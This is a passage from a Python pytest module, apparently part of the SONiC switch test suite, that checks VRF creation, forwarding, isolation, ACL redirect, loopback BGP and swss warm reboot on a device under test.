    duthost = duthosts[rand_one_dut_hostname]
    # backup config_db.json
    duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
    ## Setup global variables
    global g_vars
    try:
        ## Setup dut
        g_vars["dut_ip"] = duthost.host.options["inventory_manager"].get_host(duthost.hostname).vars["ansible_host"]
        duthost.critical_services = ["swss", "syncd", "database", "teamd", "bgp"]  # Don't care about 'pmon' and 'lldp' here
        cfg_t0 = get_cfg_facts(duthost)  # generate cfg_facts for t0 topo
        setup_vrf_cfg(duthost, localhost, cfg_t0)
        # Generate cfg_facts for t0-vrf topo, should not use cfg_facts fixture here. Otherwise, the cfg_facts
        # fixture will be executed before setup_vrf and will have the original non-VRF config facts.
        cfg_facts = get_cfg_facts(duthost)
        # Flush stale neighbor/FDB state learned under the old configuration.
        duthost.shell("sonic-clear arp")
        duthost.shell("sonic-clear nd")
        duthost.shell("sonic-clear fdb all")
        with open("../ansible/vars/topo_{}.yml".format(tbinfo['topo']['name']), 'r') as fh:
            g_vars['topo_properties'] = yaml.safe_load(fh)
        g_vars['props'] = g_vars['topo_properties']['configuration_properties']['common']
        g_vars['vlan_peer_ips'], g_vars['vlan_peer_vrf2ns_map'] = setup_vlan_peer(duthost, ptfhost, cfg_facts)
        g_vars['vrf_intfs'] = get_vrf_intfs(cfg_facts)
        g_vars['vrf_intf_member_port_indices'], g_vars['vrf_member_port_indices'] = get_vrf_ports(cfg_facts)
    except Exception as e:
        # Ensure that config_db is restored.
        # If exception is raised in setup, the teardown code won't be executed. That's why we need to capture
        # exception and do cleanup here in setup part (code before 'yield').
        logger.error("Exception raised in setup: {}".format(repr(e)))
        logger.error(json.dumps(traceback.format_exception(*sys.exc_info()), indent=2))
        restore_config_db(localhost, duthost, ptfhost)
        # Setup failed. There is no point to continue running the cases.
        pytest.fail("VRF testing setup failed")  # If this line is hit, script execution will stop here
    # --------------------- Testing -----------------------
    yield
    # --------------------- Teardown -----------------------
    restore_config_db(localhost, duthost, ptfhost)
@pytest.fixture
def partial_ptf_runner(request, ptfhost, tbinfo, dut_facts):
    """Return a helper that runs a PTF test with the common parameters filled in.

    The wrapper pre-populates testbed type, DUT router MAC and the PTF test
    port map; callers only supply the PTF test name plus any test-specific
    keyword arguments (which override the defaults).
    """
    def _partial_ptf_runner(testname, **kwargs):
        # Base parameters shared by every PTF test in this module.
        params = {'testbed_type': tbinfo['topo']['name'],
                  'router_macs': [dut_facts['router_mac']],
                  'ptf_test_port_map': PTF_TEST_PORT_MAP
                  }
        params.update(kwargs)
        # Log file is named after the calling test class and function.
        ptf_runner(host=ptfhost,
                   testdir="ptftests",
                   platform_dir="ptftests",
                   testname=testname,
                   params=params,
                   log_file="/tmp/{}.{}.log".format(request.cls.__name__, request.function.__name__))
    return _partial_ptf_runner
@pytest.fixture(scope="module")
def mg_facts(duthosts, rand_one_dut_hostname, tbinfo):
    """Module-scoped extended minigraph facts of the selected DUT."""
    return duthosts[rand_one_dut_hostname].get_extended_minigraph_facts(tbinfo)
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
    """Return the DUT VLAN MAC if one is configured (dualtor), otherwise fall
    back to the router MAC."""
    duthost = duthosts[rand_one_dut_hostname]
    config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
    dut_vlan_mac = None
    # Take the MAC of the first VLAN that declares one.
    for vlan in config_facts.get('VLAN', {}).values():
        if 'mac' in vlan:
            logger.debug('Found VLAN mac')
            dut_vlan_mac = vlan['mac']
            break
    if dut_vlan_mac:
        return dut_vlan_mac
    logger.debug('No VLAN mac, use default router_mac')
    return duthost.facts['router_mac']
@pytest.fixture(scope="module", autouse=True)
def ptf_test_port_map(tbinfo, duthosts, mg_facts, ptfhost, rand_one_dut_hostname, vlan_mac):
    """Render the PTF port -> {target DUT, target MAC} map and push it to the
    PTF host. VLAN member ports target the VLAN MAC; all others the router MAC."""
    duthost = duthosts[rand_one_dut_hostname]
    router_mac = duthost.facts['router_mac']
    vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
    port_map = {
        str(port): {
            'target_dut': 0,
            'target_mac': vlan_mac if port in vlan_ptf_ports else router_mac
        }
        for port in get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
    }
    ptfhost.copy(content=json.dumps(port_map), dest=PTF_TEST_PORT_MAP)
@pytest.fixture()
def disable_swss_warm_boot_flag(duthosts, rand_one_dut_hostname):
    """After the test runs, clear the swss warm-restart flag if it was left on."""
    yield
    duthost = duthosts[rand_one_dut_hostname]
    flag = duthost.shell("sonic-db-cli STATE_DB HGET 'WARM_RESTART_ENABLE_TABLE|swss' 'enable'")['stdout']
    if flag == 'true':
        duthost.shell("config warm_restart disable swss")
# tests
class TestVrfCreateAndBind():
    """Verify VRFs are created and interfaces bound in kernel, APPL_DB and ASIC_DB."""

    def test_vrf_in_kernel(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """Every configured VRF must exist as a kernel vrf device and own its interfaces."""
        duthost = duthosts[rand_one_dut_hostname]
        res = duthost.shell("ip link show type vrf | grep Vrf")
        for vrf in cfg_facts['VRF']:
            assert vrf in res['stdout'], "%s should be created in kernel!" % vrf
        # Each bound interface must report its VRF as the master device.
        for vrf, intfs in g_vars['vrf_intfs'].items():
            for intf in intfs:
                res = duthost.shell("ip link show %s" % intf)
                assert vrf in res['stdout'], "The master dev of interface %s should be %s !" % (intf, vrf)

    def test_vrf_in_appl_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """VRF_TABLE and INTF_TABLE entries must be present in APPL_DB."""
        duthost = duthosts[rand_one_dut_hostname]
        for vrf in cfg_facts['VRF']:
            res = duthost.shell("redis-cli -n 0 keys VRF_TABLE:%s" % vrf)
            assert vrf in res['stdout'], "%s should be added in APPL_DB!" % vrf
        # Each interface's APPL_DB entry must reference its VRF.
        for vrf, intfs in g_vars['vrf_intfs'].items():
            for intf in intfs:
                res = duthost.shell("redis-cli -n 0 hgetall \"INTF_TABLE:%s\"" % intf)
                assert vrf in res['stdout'], "The vrf of interface %s should be %s !" % (intf, vrf)

    def test_vrf_in_asic_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """ASIC_DB must hold one virtual router per VRF plus the default one."""
        duthost = duthosts[rand_one_dut_hostname]
        expected_count = len(cfg_facts['VRF']) + 1  # plus default virtual router
        res = duthost.shell("redis-cli -n 1 keys *VIRTUAL_ROUTER*")
        assert len(res['stdout_lines']) == expected_count
class TestVrfNeigh():
    """Neighbor reachability and neighbor-IP forwarding checks per VRF."""

    def test_ping_lag_neigh(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """Ping every VRF-scoped BGP neighbor through its VRF device."""
        duthost = duthosts[rand_one_dut_hostname]
        for neigh in cfg_facts['BGP_NEIGHBOR']:
            if '|' not in neigh:
                # Only VRF-scoped neighbors are keyed as '<vrf>|<ip>'.
                continue
            vrf, neigh_ip = neigh.split('|')
            ping_cmd = 'ping' if IPNetwork(neigh_ip).version == 4 else 'ping6'
            duthost.shell("{} {} -I {} -c 3 -f".format(ping_cmd, neigh_ip, vrf))

    def test_ping_vlan_neigh(self, duthosts, rand_one_dut_hostname):
        """Ping each VLAN peer address from within its VRF."""
        duthost = duthosts[rand_one_dut_hostname]
        for (vrf, _), neigh_ips in g_vars['vlan_peer_ips'].items():
            for ver, ips in neigh_ips.items():
                ping_cmd = 'ping' if ver == 'ipv4' else 'ping6'
                for ip in ips:
                    duthost.shell("{} {} -c 3 -I {} -f".format(ping_cmd, ip.ip, vrf))

    def _verify_neigh_fwd(self, vrf, neigh_file, ptfhost, partial_ptf_runner):
        # Shared driver: render the neighbor file, then verify packets to those
        # neighbors are forwarded when injected on the VRF's member ports.
        gen_vrf_neigh_file(vrf, ptfhost, render_file=neigh_file)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            fib_info_files=[neigh_file],
            src_ports=g_vars['vrf_member_port_indices'][vrf]
        )

    def test_vrf1_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
        self._verify_neigh_fwd('Vrf1', "/tmp/vrf1_neigh.txt", ptfhost, partial_ptf_runner)

    def test_vrf2_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
        self._verify_neigh_fwd('Vrf2', "/tmp/vrf2_neigh.txt", ptfhost, partial_ptf_runner)
class TestVrfFib():
    """FIB tests: routes learned in each VRF must forward traffic correctly."""

    @pytest.fixture(scope="class", autouse=True)
    def setup_fib_test(self, ptfhost, tbinfo):
        # Render the per-VRF FIB info files consumed by the PTF FibTest.
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         render_file='/tmp/vrf1_fib.txt')
        gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
                         render_file='/tmp/vrf2_fib.txt')

    def test_show_bgp_summary(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """Every BGP peer in every VRF should have received the full route count
        derived from the topology properties."""
        duthost = duthosts[rand_one_dut_hostname]
        props = g_vars['props']
        # Expected number of prefixes announced by the emulated T0 neighbors.
        route_count = props['podset_number'] * props['tor_number'] * props['tor_subnet_number']
        for vrf in cfg_facts['VRF']:
            bgp_summary_string = duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout']
            bgp_summary = json.loads(bgp_summary_string)
            for info in bgp_summary:
                for peer, attr in bgp_summary[info]['peers'].iteritems():
                    prefix_count = attr['pfxRcd']
                    # skip ipv6 peers under 'ipv4Unicast' and compare only ipv4 peers under 'ipv4Unicast', and ipv6 peers under 'ipv6Unicast'
                    if info == "ipv4Unicast" and attr['idType'] == 'ipv6':
                        continue
                    else:
                        assert int(prefix_count) == route_count, "%s should received %s route prefixs!" % (peer, route_count)

    def test_vrf1_fib(self, partial_ptf_runner):
        # Packets injected on Vrf1 member ports must follow Vrf1's FIB.
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/vrf1_fib.txt"],
            src_ports=g_vars['vrf_member_port_indices']['Vrf1']
        )

    def test_vrf2_fib(self, partial_ptf_runner):
        # Packets injected on Vrf2 member ports must follow Vrf2's FIB.
        partial_ptf_runner(
            testname="vrf_test.FibTest",
            fib_info_files=["/tmp/vrf2_fib.txt"],
            src_ports=g_vars['vrf_member_port_indices']['Vrf2']
        )
class TestVrfIsolation():
    """Verify Vrf1 and Vrf2 are isolated: traffic matching one VRF's neighbors
    or routes must be dropped when injected from the other VRF."""

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_isolation(self, ptfhost, tbinfo):
        # Render FIB and neighbor info files for both VRFs up front.
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost, render_file='/tmp/vrf1_fib.txt')
        gen_vrf_fib_file('Vrf2', tbinfo, ptfhost, render_file='/tmp/vrf2_fib.txt')
        gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
        gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")

    def _expect_drop(self, partial_ptf_runner, testname, info_file, src_ports):
        # Inject packets matching info_file on src_ports; all must be dropped.
        partial_ptf_runner(
            testname=testname,
            fib_info_files=[info_file],
            pkt_action='drop',
            src_ports=src_ports
        )

    def test_neigh_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
        # send packets from Vrf1
        self._expect_drop(partial_ptf_runner, "vrf_test.FwdTest", "/tmp/vrf2_neigh.txt",
                          g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'])

    def test_neigh_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
        # send packets from Vrf2
        self._expect_drop(partial_ptf_runner, "vrf_test.FwdTest", "/tmp/vrf1_neigh.txt",
                          g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'])

    def test_fib_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
        # send packets from Vrf1
        self._expect_drop(partial_ptf_runner, "vrf_test.FibTest", "/tmp/vrf2_fib.txt",
                          g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000'])

    def test_fib_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
        # send packets from Vrf2
        self._expect_drop(partial_ptf_runner, "vrf_test.FibTest", "/tmp/vrf1_fib.txt",
                          g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'])
class TestVrfAclRedirect():
    """Verify the ACL redirect action can steer Vrf1 traffic away from its
    original next-hops to new ones, including next-hops living in Vrf2."""

    # Shared storage populated by the class setup fixture.
    c_vars = {}

    @pytest.fixture(scope="class", autouse=True)
    def is_redirect_supported(self, duthosts, rand_one_dut_hostname):
        """
        Check if switch supports acl redirect_action, if not then skip test cases
        """
        duthost = duthosts[rand_one_dut_hostname]
        switch_cap = duthost.switch_capabilities_facts()['ansible_facts']['switch_capabilities']['switch']
        res = [capabilities for capabilities in switch_cap.values() if "REDIRECT_ACTION" in capabilities]
        if not res:
            pytest.skip("Switch does not support ACL REDIRECT_ACTION")

    @pytest.fixture(scope="class", autouse=True)
    def setup_acl_redirect(self, duthosts, rand_one_dut_hostname, cfg_facts, tbinfo):
        """Install an ACL that redirects matching Vlan1000 traffic to next-hops
        on PortChannel0002 (Vrf1) and the Vrf2 portchannel; remove on teardown."""
        duthost = duthosts[rand_one_dut_hostname]
        # -------- Setup ----------
        # make sure neighs from Vlan2000 are resolved
        vlan_peer_port = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][0]
        vlan_neigh_ip = g_vars['vlan_peer_ips'][('Vrf2', vlan_peer_port)]['ipv4'][0]
        duthost.shell("ping {} -I {} -c 3 -f".format(vlan_neigh_ip.ip, 'Vrf2'))
        vrf_intf_ports = g_vars['vrf_intf_member_port_indices']
        src_ports = [vrf_intf_ports['Vrf1']['Vlan1000'][0]]
        dst_ports = [vrf_intf_ports['Vrf1']['PortChannel0001']]
        # The .ip+1 convention yields the peer address of each point-to-point
        # subnet configured on the portchannel — TODO confirm for non-/31 subnets.
        pc1_intf_ips = get_intf_ips('PortChannel0001', cfg_facts)
        pc1_v4_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv4'] ]
        pc1_v6_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv6'] ]
        # Redirect target 1: neighbors on PortChannel0002 (same VRF).
        pc2_if_name = 'PortChannel0002'
        pc2_if_ips = get_intf_ips(pc2_if_name, cfg_facts)
        pc2_v4_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv4'] ]
        pc2_v6_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv6'] ]
        # Redirect target 2: neighbors on the last portchannel, which is in Vrf2.
        pc_vrf2_if_name = 'PortChannel000{}'.format(len(tbinfo['topo']['properties']['topology']['VMs']))
        pc_vrf2_if_ips = get_intf_ips(pc_vrf2_if_name, cfg_facts)
        pc_vrf2_v4_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv4'] ]
        pc_vrf2_v6_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv6'] ]
        redirect_dst_ips = pc2_v4_neigh_ips + pc_vrf2_v4_neigh_ips
        redirect_dst_ipv6s = pc2_v6_neigh_ips + pc_vrf2_v6_neigh_ips
        redirect_dst_ports = []
        redirect_dst_ports.append(vrf_intf_ports['Vrf1'][pc2_if_name])
        redirect_dst_ports.append(vrf_intf_ports['Vrf2'][pc_vrf2_if_name])
        # Stash what the test cases need.
        self.c_vars['src_ports'] = src_ports
        self.c_vars['dst_ports'] = dst_ports
        self.c_vars['redirect_dst_ports'] = redirect_dst_ports
        self.c_vars['pc1_v4_neigh_ips'] = pc1_v4_neigh_ips
        self.c_vars['pc1_v6_neigh_ips'] = pc1_v6_neigh_ips
        # load acl redirect configuration
        extra_vars = {
            'src_port': get_vlan_members('Vlan1000', cfg_facts)[0],
            'redirect_dst_ips': redirect_dst_ips,
            'redirect_dst_ipv6s': redirect_dst_ipv6s
        }
        duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
        duthost.template(src="vrf/vrf_acl_redirect.j2", dest="/tmp/vrf_acl_redirect.json")
        duthost.shell("config load -y /tmp/vrf_acl_redirect.json")
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        # Remove the ACL rules and tables installed above.
        duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V4|rule1'")
        duthost.shell("redis-cli -n 4 del 'ACL_RULE|VRF_ACL_REDIRECT_V6|rule1'")
        duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V4'")
        duthost.shell("redis-cli -n 4 del 'ACL_TABLE|VRF_ACL_REDIRECT_V6'")

    def test_origin_ports_recv_no_pkts_v4(self, partial_ptf_runner, ptfhost):
        # verify origin dst ports should not receive packets any more
        gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['dst_ports'],
                                '/tmp/pc01_neigh_ipv4.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='drop',
            src_ports=self.c_vars['src_ports'],
            fib_info_files=['/tmp/pc01_neigh_ipv4.txt']
        )

    def test_origin_ports_recv_no_pkts_v6(self, partial_ptf_runner, ptfhost):
        # verify origin dst ports should not receive packets any more
        gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['dst_ports'],
                                '/tmp/pc01_neigh_ipv6.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            pkt_action='drop',
            src_ports=self.c_vars['src_ports'],
            fib_info_files=['/tmp/pc01_neigh_ipv6.txt']
        )

    def test_redirect_to_new_ports_v4(self, partial_ptf_runner, ptfhost):
        # verify redicect ports should receive packets
        gen_specific_neigh_file(self.c_vars['pc1_v4_neigh_ips'], self.c_vars['redirect_dst_ports'],
                                '/tmp/redirect_pc01_neigh_ipv4.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            src_ports=self.c_vars['src_ports'],
            test_balancing=True,
            balancing_test_times=1000,
            balancing_test_ratio=1.0,  # test redirect balancing
            fib_info_files=['/tmp/redirect_pc01_neigh_ipv4.txt']
        )

    def test_redirect_to_new_ports_v6(self, partial_ptf_runner, ptfhost):
        # verify redicect ports should receive packets
        gen_specific_neigh_file(self.c_vars['pc1_v6_neigh_ips'], self.c_vars['redirect_dst_ports'],
                                '/tmp/redirect_pc01_neigh_ipv6.txt', ptfhost)
        partial_ptf_runner(
            testname="vrf_test.FwdTest",
            src_ports=self.c_vars['src_ports'],
            test_balancing=True,
            balancing_test_times=1000,
            balancing_test_ratio=1.0,  # test redirect balancing
            fib_info_files=['/tmp/redirect_pc01_neigh_ipv6.txt']
        )
class TestVrfLoopbackIntf():
    """Loopback interface tests: per-VRF loopback reachability and BGP
    sessions sourced from a loopback address."""

    # Shared storage populated by the class setup fixture.
    c_vars = {}
    # Prefix announced by the exabgp speaker in the BGP-over-loopback test.
    announce_prefix = '10.10.10.0/26'

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts, tbinfo):
        """Install PTF namespace routes towards the DUT loopbacks via the VLAN peers."""
        duthost = duthosts[rand_one_dut_hostname]
        # -------- Setup ----------
        lb0_ip_facts = get_intf_ips('Loopback0', cfg_facts)
        vlan1000_ip_facts = get_intf_ips('Vlan1000', cfg_facts)
        lb2_ip_facts = get_intf_ips('Loopback2', cfg_facts)
        vlan2000_ip_facts = get_intf_ips('Vlan2000', cfg_facts)
        self.c_vars['lb0_ip_facts'] = lb0_ip_facts
        self.c_vars['lb2_ip_facts'] = lb2_ip_facts
        self.c_vars['vlan1000_ip_facts'] = vlan1000_ip_facts
        self.c_vars['vlan2000_ip_facts'] = vlan2000_ip_facts
        # deploy routes to loopback
        for ver, ips in lb0_ip_facts.iteritems():
            # Use the first Vlan1000 address of the same family as next hop.
            for vlan_ip in vlan1000_ip_facts[ver]:
                nexthop = vlan_ip.ip
                break
            for ip in ips:
                ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip, nexthop))
        for ver, ips in lb2_ip_facts.iteritems():
            # Same for Loopback2, reachable through the Vrf2 namespace.
            for vlan_ip in vlan2000_ip_facts[ver]:
                nexthop = vlan_ip.ip
                break
            for ip in ips:
                ptfhost.shell("ip netns exec {} ip route add {} nexthop via {} ".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip, nexthop))
        # Allow ping6 to bind the loopback address as source inside a VRF.
        duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=1")
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        # routes on ptf could be flushed when remove vrfs
        duthost.shell("sysctl -w net.ipv6.ip_nonlocal_bind=0")

    def test_ping_vrf1_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
        """Loopback0 (Vrf1) must be reachable: v4 from the PTF, v6 from the DUT."""
        duthost = duthosts[rand_one_dut_hostname]
        for ver, ips in self.c_vars['lb0_ip_facts'].iteritems():
            for ip in ips:
                if ip.version == 4:
                    # FIXME Within a vrf, currently ping(4) does not support using
                    # an ip of loopback intface as source(it complains 'Cannot assign
                    # requested address'). An alternative is ping the loopback address
                    # from ptf
                    ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf1'], ip.ip))
                else:
                    # Ping the VLAN peer (.ip+1 of the first Vlan1000 v6 subnet)
                    # sourcing from the loopback v6 address.
                    neigh_ip6 = self.c_vars['vlan1000_ip_facts']['ipv6'][0].ip + 1
                    duthost.shell("ping6 {} -I Vrf1 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))

    def test_ping_vrf2_loopback(self, ptfhost, duthosts, rand_one_dut_hostname):
        """Loopback2 (Vrf2) must be reachable: v4 from the PTF, v6 from the DUT."""
        duthost = duthosts[rand_one_dut_hostname]
        for ver, ips in self.c_vars['lb2_ip_facts'].iteritems():
            for ip in ips:
                if ip.version == 4:
                    # FIXME Within a vrf, currently ping(4) does not support using
                    # an ip of loopback intface as source(it complains 'Cannot assign
                    # requested address'). An alternative is ping the loopback address
                    # from ptf
                    ptfhost.shell("ip netns exec {} ping {} -c 3 -f -W2".format(g_vars['vlan_peer_vrf2ns_map']['Vrf2'], ip.ip))
                else:
                    neigh_ip6 = self.c_vars['vlan2000_ip_facts']['ipv6'][0].ip + 1
                    duthost.shell("ping6 {} -I Vrf2 -I {} -c 3 -f -W2".format(neigh_ip6, ip.ip))

    @pytest.fixture
    def setup_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, ptfhost, cfg_facts):
        """Start an exabgp speaker on the PTF peering with the DUT over the
        BGPSLBPassive peer range; tear the speaker and routes down afterwards."""
        duthost = duthosts[rand_one_dut_hostname]
        # ----------- Setup ----------------
        # FIXME Create a dummy bgp session.
        # Workaroud to overcome the bgp socket issue.
        # When there are only vrf bgp sessions and
        # net.ipv4.tcp_l3mdev_accept=1, bgpd(7.0) does
        # not create bgp socket for sessions.
        duthost.shell("vtysh -c 'config terminal' -c 'router bgp 65444'")
        # vrf1 args, vrf2 use the same as vrf1
        peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
        ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
        vlan_port = get_vlan_members('Vlan1000', cfg_facts)[0]
        vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
        ptf_direct_ip = g_vars['vlan_peer_ips'][('Vrf1', vlan_peer_port)]['ipv4'][0]
        # add route to ptf_speaker_ip
        for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
            nh = ips['ipv4'][0].ip
            duthost.shell("vtysh -c 'configure terminal' -c 'ip route {} {} vrf {}'".format(peer_range, nh, vrf))
            duthost.shell("ping {} -I {} -c 3 -f -W2".format(nh, vrf))
        # add speaker ips to ptf macvlan ports
        for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
            ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
            ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
        # Derive the speaker ASN from the deployment-id/ASN map in constants.yml.
        res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
        bgp_speaker_asn = res['stdout']
        exabgp_dir = "/root/exabgp"
        ptfhost.file(path=exabgp_dir, state="directory")
        extra_vars = {
            'exabgp_dir': exabgp_dir,
            'announce_prefix': self.announce_prefix,
            'peer_asn' : cfg_facts['DEVICE_METADATA']['localhost']['bgp_asn'],
            'my_asn' : bgp_speaker_asn,
            'speaker_ip': ptf_speaker_ip.ip,
            'direct_ip' : ptf_direct_ip.ip,
            'namespace' : g_vars['vlan_peer_vrf2ns_map'].values(),
            'lo_addr' : get_intf_ips('Loopback0', cfg_facts)['ipv4'][0].ip
        }
        ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
        ptfhost.template(src="vrf/bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, 'config.ini'))
        # deploy start script
        ptfhost.template(src="vrf/bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, 'start.sh'), mode="u+rwx")
        # kill exabgp if any
        ptfhost.shell("pkill exabgp || true")
        # start exabgp instance
        ptfhost.shell("bash %s/start.sh" % exabgp_dir)
        # ensure exabgp started
        ptfhost.shell("pgrep exabgp")
        # make sure routes announced to bgp neighbors
        time.sleep(10)
        # -------- Testing ----------
        yield
        # -------- Teardown ---------
        # del route to ptf_speaker_ip on dut
        for (vrf, vlan_peer_port), ips in g_vars['vlan_peer_ips'].iteritems():
            duthost.shell("vtysh -c 'configure terminal' -c 'no ip route {} {} vrf {}'".format(peer_range, ips['ipv4'][0], vrf))
        # kill exabgp
        ptfhost.shell("pkill exabgp || true")
        # del speaker ips from ptf ports
        for vrf, vlan_peer_port in g_vars['vlan_peer_ips']:
            ns = g_vars['vlan_peer_vrf2ns_map'][vrf]
            ptfhost.shell("ip netns exec {} ip address del {} dev e{}mv1".format(ns, ptf_speaker_ip, vlan_peer_port))
        # FIXME workround to overcome the bgp socket issue
        #duthost.shell("vtysh -c 'config terminal' -c 'no router bgp 65444'")

    @pytest.mark.usefixtures('setup_bgp_with_loopback')
    def test_bgp_with_loopback(self, duthosts, rand_one_dut_hostname, cfg_facts):
        """The dynamic speaker session must be Established in every VRF and
        deliver exactly the one announced prefix."""
        duthost = duthosts[rand_one_dut_hostname]
        peer_range = IPNetwork(cfg_facts['BGP_PEER_RANGE']['BGPSLBPassive']['ip_range'][0])
        ptf_speaker_ip = IPNetwork("{}/{}".format(peer_range[1], peer_range.prefixlen))
        for vrf in cfg_facts['VRF']:
            bgp_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout'])
            route_info = duthost.shell("vtysh -c 'show bgp vrf {} ipv4 {}'".format(vrf, self.announce_prefix))
            # Verify bgp sessions are established
            assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['state'] == 'Established', \
                "Bgp peer {} should be Established!".format(ptf_speaker_ip.ip)
            # Verify accepted prefixes of the dynamic neighbors are correct
            assert bgp_info['ipv4Unicast']['peers'][str(ptf_speaker_ip.ip)]['pfxRcd'] == 1
class TestVrfWarmReboot():
    """Verify VRF traffic keeps flowing across swss warm-restart and a full
    system warm reboot (traffic is sent in a background thread meanwhile)."""

    @pytest.fixture(scope="class", autouse=True)
    def setup_vrf_warm_reboot(self, ptfhost, tbinfo):
        # -------- Setup ----------
        # Use a reduced FIB so the background traffic run completes quickly.
        gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
                         render_file='/tmp/vrf1_fib.txt',
                         limited_podset_number=50,
                         limited_tor_number=16)
        # -------- Testing ----------
        yield
        # -------- Teardown ----------
        #FIXME Might need cold reboot if test failed?
        pass

    @pytest.mark.usefixtures('disable_swss_warm_boot_flag')
    def test_vrf_swss_warm_reboot(self, duthosts, rand_one_dut_hostname, cfg_facts, partial_ptf_runner):
        """Restart swss with warm-restart enabled while traffic runs in background."""
        duthost = duthosts[rand_one_dut_hostname]
        # enable swss warm-reboot
        duthost.shell("config warm_restart enable swss")
        # Exceptions from the traffic thread are passed back through this queue.
        exc_que = Queue.Queue()
        params = {
            'ptf_runner': partial_ptf_runner,
            'exc_queue': exc_que,  # use for store exception infos
            'testname': 'vrf_test.FibTest',
            'fib_info_files': ["/tmp/vrf1_fib.txt"],
            'src_ports': g_vars['vrf_member_port_indices']['Vrf1']
        }
        traffic_in_bg = threading.Thread(target=ex_ptf_runner, kwargs=params)
        # send background traffic
        traffic_in_bg.start()
        logger.info("Start transmiting packets...")
        # start swss warm-reboot
        duthost.shell("service swss restart")
        logger.info("Warm reboot swss...")
        # wait until background traffic finished
        traffic_in_bg.join()
        logger.info("Transmit done.")
        passed = True
        if exc_que.qsize() != 0:
            passed = False
            exc_type, exc_obj, exc_trace = exc_que.get()
        assert passed == True, "Traffic Test Failed \n {}".format(str(exc_obj))
        # wait until components finish reconcile
        tbd_comp_list = finalize_warmboot(duthost)
        assert len(tbd_comp_list) == 0, \
            "Some components didn't finish reconcile: {} ...".format(tbd_comp_list)
        # basic check after warm reboot
        assert wait_until(300, 20, 0, duthost.critical_services_fully_started), \
            "All critical services should fully started!{}".format(duthost.critical_services)
        up_ports = [p for p, v in cfg_facts['PORT'].items() if v.get('admin_status', None) == 'up' ]
